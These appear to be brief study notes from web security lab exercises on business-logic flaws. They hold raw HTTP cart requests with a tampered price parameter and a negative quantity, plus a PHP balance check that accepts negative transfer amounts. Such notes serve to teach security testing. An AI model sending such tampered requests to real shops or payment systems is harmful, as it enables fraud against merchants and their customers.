Price Change
Wrong
assumption that users will interact with the application only via interface.
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=133700
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=1
Bank Transfer
An attacker may pass in a
negative value and induce unwanted behavior.
$transferAmount = $_POST['amount'];
$currentBalance = $user->getBalance();
if ($transferAmount <= $currentBalance) {
} else {}
Negative Quantity
Exploit on an website that doesn't check
negative quantities.
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=2&redir=PRODUCT&quantity=-100